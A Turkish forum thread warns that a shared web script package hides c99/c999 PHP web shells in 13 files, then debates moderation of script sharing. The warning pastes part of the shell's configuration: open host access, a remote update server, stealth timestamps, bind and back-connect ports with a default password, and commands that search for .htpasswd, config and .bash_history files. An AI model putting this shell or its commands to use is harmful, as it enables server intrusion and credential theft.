Shell dolu icerisi Temizi OYkmu bunun arkadaslar ?
13 Farkli Yerde Shell Buldum c99
daha kac tane var allah bilir indiren arkaDASLAR dIKKAT lÜTFEN
kESINLIKLE hOSTUNUZA aTMANIZ Tafsiye edilmez Deneme amacli filan atip kurarsaniz Vay Halinize
Shell Bulastirilmis Dosyalardan Sadece bi tanesi Örnek
/resimler/Tablolar/tablo1/index.php.php
$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
$login_txt = "Restricted area"; //http-auth message.
$accessdeniedmess = "<a href=\"http://ccteam.ru/releases/c999shell\">c999shell v.".$shver."</a>: access denied";
$gzipencode = TRUE; //Encode with gzip?
$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE)
$c999sh_updateurl = "http://ccteam.ru/update/c999shell/"; //Update server
$c999sh_sourcesurl = "http://ccteam.ru/files/c999sh_sources/"; //Sources-server
$filestealth = TRUE; //if TRUE, don't change modify- and access-time
$donated_html = "<center><b>EL_MuHaMMeD</b></center>";
/* If you publish free shell and you wish
add link to your site or any other information,
put here your html. */
$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.
$curdir = "./"; //start folder
//$curdir = getenv("DOCUMENT_ROOT");
$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)
$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)
$log_email = "user@host.tld"; //Default e-mail for sending logs
$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending
$sort_save = TRUE; //If TRUE then save sorting-position using cookies.
/* Highlighted files.
array(
i=>array({regexp},{type},{opentag},{closetag},{break})
...
)
string {regexp} - regular exp.
int {type}:
0 - files and folders (as default),
1 - files only, 2 - folders only
string {opentag} - open html-tag, e.g. "<b>" (default)
string {closetag} - close html-tag, e.g. "</b>" (default)
bool {break} - if TRUE and found match then break
*/
$regxp_highlight = array(
array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example
array("config.php",1) // example
);
$safemode_diskettes = array("a"); // This variable for disabling diskett-errors.
// array (i=>{letter} ...); string {letter} - letter of a drive
//$safemode_diskettes = range("a","z");
$hexdump_lines = 8;// lines in hex preview file
$hexdump_rows = 24;// 16, 24 or 32 bytes in one line
$nixpwdperpage = 100; // Get first N lines from /etc/passwd
$bindport_pass = "c999"; // default password for binding
$bindport_port = "31373"; // default port for binding
$bc_port = "31373"; // default port for back-connect
$datapipe_localport = "8081"; // default port for datapipe
// Command-aliases
if (!$win)
{
$cmdaliases = array(
array("-----------------------------------------------------------", "ls -la"),
array("find all suid files", "find / -type f -perm -04000 -ls"),
array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
array("find all sgid files", "find / -type f -perm -02000 -ls"),
array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
array("find config.inc.php files", "find / -type f -name config.inc.php"),
array("find config* files", "find / -type f -name \"config*\""),
array("find config* files in current dir", "find . -type f -name \"config*\""),
array("find all writable folders and files", "find / -perm -2 -ls"),
array("find all writable folders and files in current dir", "find . -perm -2 -ls"),
array("find all service.pwd files", "find / -type f -name service.pwd"),
array("find service.pwd files in current dir", "find . -type f -name service.pwd"),
array("find all .htpasswd files", "find / -type f -name .htpasswd"),
array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
array("find all .bash_history files", "find / -type f -name .bash_history"),
array("find .bash_history files in current dir", "find . -type f -name .bash_history"),
array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
array("list file attributes on a Linux second extended file system", "lsattr -va"),
array("show opened ports", "netstat -an | grep -i listen")
);
}
else
{
$cmdaliases = array(
array("-----------------------------------------------------------", "dir"),
array("show opened ports", "netstat -an")
);
}
$sess_cookie = "c999shvars"; // Cookie-variable name
$usefsbuff = TRUE; //Buffer-function
$copy_unset = FALSE; //Remove copied files from buffer after pasting
diyer shell dosyasıda image/banner/swf/swf.php dosyası aslında biraz uğraşılırsa kodlar ap açık ortada kaldırılıp kullanıla bilir elinde açıksız paneli olmayanlar cok basit sadece dosyaları teker kere kontrol edin ) hatta ben size bi kaç tanesinin daha yerini söyleyeyim silin ve kullanın sesli/forumlar/frm.smiccer.php sonraki sesli/temalar/standart/akt/ajax/ajax.kayit.php
arkadaşlar anlamayan katiyen kurmasın ben fazla zamanım olmadığı için dosyaların çoğuna bakamadım siz sırasıyla bakıp bulduğunuz dosyaları silin madem bişe paylaşıyorsunuz adam akıllı paylaşımlar yapın burayı paylaşım sayfası yerine hack sayfasına çevirdiniz be
evet haklısın TaFnZeLL kardeş ama yazık bu millete adamlar heveslenip elinde ne varsa hemen sunucu domain falan alıyolar ondan sonra başlarına bi dünya iş çıkıyor
evet arkadaslar malesef shellsiz trojensiz virussuz paylasim hemen hemen hic yok 13 sayfaya birden gömmüsler. cok iyi niyetli gibi görünen paylasimlar ama dikkat etmek gerek Bu arada Gümüsvadi ynalis anlama Maksat acmis oldugun Paylasimi Baltalamak degil Kardesim.
Şimdi bide şu var main-board kalitesinde bir forumda her türlü script paylaşımı kontrolsüz biçimde yapılmamalıdır. Moderatörler scriptleri gerekise kontol etmelidir. A site veya B site shell li bir script paylaşıyor ve görüyoruz main board forumunda aynı şekilde indirmeye sunulmuş.
Shell olarak .jpg dikkat edin genelde linux sistemlerde ölümcül sonuç yaratabilir !
Görünmez shell olayı bu aralar popüler diyelimki bir wordpress teması indiriyoruz . Wordpress Tema sitelerinden indirdiğimiz temaların güvenligi yoktur. Adam shell kodunu şifreleyip atıyor . Zend'li veya İconcube'li scriptleri kulanmaktan cekinin ! Aynı şey burdada geçerlidir. Ne yapıyoruz iconcube veya zend olan panellere dikkat ediyoruz.
Azer her lafa muhalefet olmaya bire birsin ben düşüncemi söyledim kurallardan haberimiz var herkezin burda bukadar rahat paylaşım yapmasına anlam veremiyorum. Script zone = Warez zone olmuş sadece bunu söylemek istedim ...
( Azer her lafa muhalefet olmaya bire birsin ) evet öyleyip buraya gelip 7 köyün ağası gibi konuşursan muhalefet olurum bişeyi beğenmediğin zaman indirmessin olur biter...
birinin paylaşdığı panel veya bi tasarım çalısmasa bile emeğe saygı duymak gerekioo...
adam düşünmüş eklemiş...
ha bu arada kendi forumunu açınca Moderatörlerine scriptleri gerekise kontol etmelidir. dersin.. tek tek incelerler bütün dosyaları ömürleri yeterse